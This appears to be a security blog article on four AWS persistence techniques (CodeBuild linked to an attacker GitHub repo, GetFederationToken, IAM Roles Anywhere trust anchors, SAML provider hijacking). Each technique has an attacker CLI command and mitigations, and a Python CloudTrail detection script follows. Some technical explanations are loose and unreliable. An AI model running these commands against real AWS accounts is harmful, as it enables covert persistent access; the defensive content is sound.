Introduction
Attackers are constantly evolving their techniques to maintain persistence in cloud environments like AWS. By exploiting misconfigurations, abusing legitimate services, and leveraging temporary credentials, they can establish long-term access even after initial compromises are detected. This article explores four advanced AWS persistence techniques and provides actionable mitigation strategies.
Learning Objectives
- Understand how attackers abuse CodeBuild + GitHub OIDC for persistent access.
- Learn how GetFederationToken can be exploited for temporary credential abuse.
- Recognize the risks of IAM Roles Anywhere and SAML IdP hijacking.
1. CodeBuild + GitHub OIDC Backdoor
Command:
aws codebuild create-project --name "MaliciousBuild" \
  --source type=GITHUB,location=https://github.com/attacker/repo \
  --service-role arn:aws:iam::123456789012:role/CodeBuildRole
What It Does:
Attackers create a CodeBuild project linked to a GitHub repository with OpenID Connect (OIDC) integration. Every time a GitHub workflow runs, fresh temporary AWS credentials are issued, allowing persistent access.
Mitigation:
- Restrict IAM roles used by CodeBuild with least-privilege policies.
- Monitor for unusual CodeBuild activity in CloudTrail.
2. GetFederationToken Abuse
Command:
aws sts get-federation-token --name Attacker --policy-arns arn=arn:aws:iam::aws:policy/AdministratorAccess
What It Does:
This command generates temporary credentials valid for up to 36 hours, which attackers can use to maintain access without triggering permanent credential alerts.
Mitigation:
- Limit `GetFederationToken` permissions in IAM policies.
- Use AWS GuardDuty to detect anomalous STS API calls.
3. IAM Roles Anywhere with X.509 Certificates
Command:
aws rolesanywhere create-trust-anchor --name MaliciousAnchor \
  --source "sourceType=CERTIFICATE_BUNDLE,sourceData={x509CertificateData=-----BEGIN CERTIFICATE-----...}"
What It Does:
Attackers upload a malicious X.509 certificate to assume IAM roles from outside AWS, bypassing traditional credential checks.
Mitigation:
- Disable IAM Roles Anywhere if unused.
- Enforce strict certificate validation and rotation.
4. SAML Identity Provider Hijacking
Command:
aws iam update-saml-provider --saml-metadata-document file://malicious_metadata.xml --saml-provider-arn arn:aws:iam::123456789012:saml-provider/ADFS
What It Does:
By modifying a SAML IdP’s metadata, attackers can redirect authentication to a malicious endpoint and assume trusted roles.
Mitigation:
- Enable MFA for SAML-based roles.
- Monitor SAML provider changes in CloudTrail.
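As an added illustration of the CloudTrail monitoring recommended in the mitigations above (this code is not from the original article), a small Python scanner that flags the four API calls behind these techniques and rates the CodeBuild and GetFederationToken cases by their request parameters. The log records, the trusted-org allowlist and the requestParameters shapes are constructed assumptions, not real account data.

```python
import json
# Constructed CloudTrail records for the four techniques above (not real account data);
# the requestParameters shapes are simplified assumptions.
SAMPLE_LOG = """
{"eventTime":"2024-05-01T10:00:00Z","eventSource":"codebuild.amazonaws.com","eventName":"CreateProject","userIdentity":{"arn":"arn:aws:iam::123456789012:user/dev"},"sourceIPAddress":"198.51.100.7","requestParameters":{"name":"MaliciousBuild","source":{"type":"GITHUB","location":"https://github.com/attacker/repo"}}}
{"eventTime":"2024-05-01T10:05:00Z","eventSource":"sts.amazonaws.com","eventName":"GetFederationToken","userIdentity":{"arn":"arn:aws:iam::123456789012:user/dev"},"sourceIPAddress":"198.51.100.7","requestParameters":{"name":"Attacker","durationSeconds":129600,"policyArns":[{"arn":"arn:aws:iam::aws:policy/AdministratorAccess"}]}}
{"eventTime":"2024-05-01T10:07:00Z","eventSource":"s3.amazonaws.com","eventName":"ListBuckets","userIdentity":{"arn":"arn:aws:iam::123456789012:user/dev"},"sourceIPAddress":"198.51.100.7","requestParameters":null}
{"eventTime":"2024-05-01T10:09:00Z","eventSource":"rolesanywhere.amazonaws.com","eventName":"CreateTrustAnchor","userIdentity":{"arn":"arn:aws:iam::123456789012:user/dev"},"sourceIPAddress":"198.51.100.7","requestParameters":{"name":"MaliciousAnchor"}}
{"eventTime":"2024-05-01T10:12:00Z","eventSource":"iam.amazonaws.com","eventName":"UpdateSAMLProvider","userIdentity":{"arn":"arn:aws:iam::123456789012:user/dev"},"sourceIPAddress":"198.51.100.7","requestParameters":{"sAMLProviderArn":"arn:aws:iam::123456789012:saml-provider/ADFS"}}
"""

TRUSTED_GITHUB_ORGS = ("https://github.com/example-corp/",)  # constructed allowlist
ADMIN_POLICY = "arn:aws:iam::aws:policy/AdministratorAccess"
WATCHLIST = {  # (eventSource, eventName) -> finding label
    ("codebuild.amazonaws.com", "CreateProject"): "codebuild-project-created",
    ("sts.amazonaws.com", "GetFederationToken"): "federation-token-issued",
    ("rolesanywhere.amazonaws.com", "CreateTrustAnchor"): "roles-anywhere-trust-anchor",
    ("iam.amazonaws.com", "UpdateSAMLProvider"): "saml-provider-modified",
}

def classify(event):
    """Return (label, severity) for one record, or None if it is not on the watchlist."""
    key = (event.get("eventSource"), event.get("eventName"))
    label = WATCHLIST.get(key)
    if label is None:
        return None
    params = event.get("requestParameters") or {}
    severity = "high"  # trust-anchor and SAML-provider changes are rare and always worth review
    if key[1] == "CreateProject":
        # A GitHub source outside the trusted orgs is the suspicious case
        loc = (params.get("source") or {}).get("location", "")
        severity = "medium" if loc.startswith(TRUSTED_GITHUB_ORGS) else "high"
    elif key[1] == "GetFederationToken":
        # Flag long-lived (> 12 h) or admin-scoped federation tokens
        arns = {p.get("arn") for p in params.get("policyArns", [])}
        long_lived = params.get("durationSeconds", 0) > 43200
        severity = "high" if long_lived or ADMIN_POLICY in arns else "medium"
    return label, severity

def scan(log_text):
    """Scan newline-delimited CloudTrail JSON and return the matching findings."""
    findings = []
    for line in log_text.strip().splitlines():
        event = json.loads(line)
        hit = classify(event)
        if hit:
            findings.append({"time": event["eventTime"], "actor": event["userIdentity"]["arn"],
                             "ip": event["sourceIPAddress"], "finding": hit[0], "severity": hit[1]})
    return findings
```

Calling `scan(SAMPLE_LOG)` returns four high-severity findings and skips the benign `ListBuckets` record; in practice the same logic would run over CloudTrail exports or a CloudWatch Logs subscription.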
What Undercode Say
- Key Takeaway 1: Attackers increasingly abuse cloud-native services (CodeBuild, IAM Roles Anywhere) for stealthy persistence.
- Key Takeaway 2: Temporary credentials (STS, OIDC) are a major blind spot in AWS security monitoring.
Analysis:
Cloud environments require continuous monitoring for abnormal API calls, especially around credential issuance and role assumptions. Organizations must adopt zero-trust principles, enforce strict IAM policies, and automate detection for these persistence techniques.
Prediction
As cloud adoption grows, attackers will develop more sophisticated persistence methods, such as abusing serverless functions (Lambda) or container services (ECS/EKS). Proactive hardening and behavioral analytics will become critical defenses.
Reported By: Adan Álvarez – Hackers Feeds